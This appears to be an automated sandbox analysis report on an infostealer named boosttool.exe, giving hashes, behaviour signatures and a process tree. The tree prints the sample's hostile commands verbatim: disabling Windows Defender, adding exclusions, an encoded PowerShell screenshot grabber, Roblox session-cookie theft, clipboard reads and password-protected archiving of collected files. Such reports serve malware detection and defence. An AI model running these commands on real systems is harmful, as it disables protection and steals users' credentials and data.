Analysis

  • max time kernel
    92s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-12-2024 00:59

General

  • Target

    boosttool.exe

  • Size

    11.6MB

  • MD5

    9d37471aabf29eaf9427bd8638beca5d

  • SHA1

    e547db6c6f8c055e256d2a7aebb6f21b5d17c4ab

  • SHA256

    b169d0f2f9a16e284ec681af72379f9841ac1f0bd648681dedffbee9563484c8

  • SHA512

    b16e3b3bbaf047f65f021f4fcb3fd3ca768c27d6693631c1245a16d965a6fd2527c54e42ed54dbf631da2b3f163015bbbaeba86bd0f4d6ee6c914da12937b5d4

  • SSDEEP

    196608:+WYShE+5vi5HuUYBDfWgtlA5RsO5ne0COshoKMuIkhVastRL5Di3uV1DV+:PYSyT5cSgtS7OOshouIkPftRL54u3+

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\boosttool.exe
    "C:\Users\Admin\AppData\Local\Temp\boosttool.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Users\Admin\AppData\Local\Temp\boosttool.exe
      "C:\Users\Admin\AppData\Local\Temp\boosttool.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boosttool.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boosttool.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2888
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4664
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4064
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2792
          • C:\Windows\system32\cmd.exe
            cmd /c cls
            5⤵
              PID:1524
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1820
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3492
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2288
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3700
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:3044
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3836
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:4532
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:432
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:1688
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1760
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:808
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\boosttool.exe""
              3⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:3676
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\boosttool.exe"
                4⤵
                • Views/modifies file attributes
                PID:4736
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2164
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2024
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2628
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4192
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4408
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:2492
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:2532
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2412
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:3416
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:2840
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:2392
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:764
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:4536
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:3828
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:4840
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:928
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qkbn0lbn\qkbn0lbn.cmdline"
                              5⤵
                                PID:2352
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA76.tmp" "c:\Users\Admin\AppData\Local\Temp\qkbn0lbn\CSC308CC8798FD54582A46E4B3C33CB2C3.TMP"
                                  6⤵
                                    PID:1996
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:1668
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:2976
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1988
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:1928
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:3700
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1596
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:3052
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3160
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:2212
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:228
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:2656
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2196
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:4660
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3192
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                      3⤵
                                                        PID:2400
                                                        • C:\Windows\system32\getmac.exe
                                                          getmac
                                                          4⤵
                                                            PID:2156
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI12802\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\OZzgw.zip" *"
                                                          3⤵
                                                            PID:3484
                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12802\rar.exe
                                                              C:\Users\Admin\AppData\Local\Temp\_MEI12802\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\OZzgw.zip" *
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:3660
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                            3⤵
                                                              PID:2496
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic os get Caption
                                                                4⤵
                                                                  PID:3200
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                3⤵
                                                                  PID:3672
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    4⤵
                                                                      PID:1996
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic computersystem get totalphysicalmemory
                                                                      4⤵
                                                                        PID:2212
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                      3⤵
                                                                        PID:4888
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic csproduct get uuid
                                                                          4⤵
                                                                            PID:5052
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                          3⤵
                                                                            PID:1120
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:832
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                            3⤵
                                                                              PID:1912
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic path win32_VideoController get name
                                                                                4⤵
                                                                                • Detects videocard installed
                                                                                PID:5112
